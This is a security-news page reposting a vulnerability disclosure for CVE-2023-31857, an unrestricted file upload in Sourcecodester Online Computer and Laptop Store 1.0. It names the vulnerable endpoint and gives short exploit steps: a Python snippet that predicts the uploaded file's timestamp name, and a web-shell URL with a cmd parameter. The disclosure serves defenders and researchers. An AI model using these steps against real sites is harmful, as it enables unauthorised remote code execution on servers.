Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-31857: php-ocls/README.md at main · Jadore147258369/php-ocls

Sourcecodester Online Computer and Laptop Store 1.0 allows unrestricted file upload and can lead to remote code execution. The vulnerability path is /classes/Users.php?f=save.

CVE
Open in Source
#vulnerability#php#rce

Permalink

Cannot retrieve contributors at this time

php-ocls

php-ocls Online Computer and Laptop Store 1.0 allows Unrestricted file upload and can lead to remote code execution. The vulnerability located in /classes/Users.php?f=save. The name of the uploaded file can be easily obtained through the timestamp.

  1. Send the request and note when it was sent.

  2. Calculate the timestamp.

    import time

timeArray = time.strptime('2023-04-24 13:40:00', "%Y-%m-%d %H:%M:%S")
time_format= time.mktime(timeArray)
print(int(time_format))
  1. Get Shell. http://192.168.3.43/php-ocls/uploads/1682314800_shell.php?cmd=phpinfo();

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE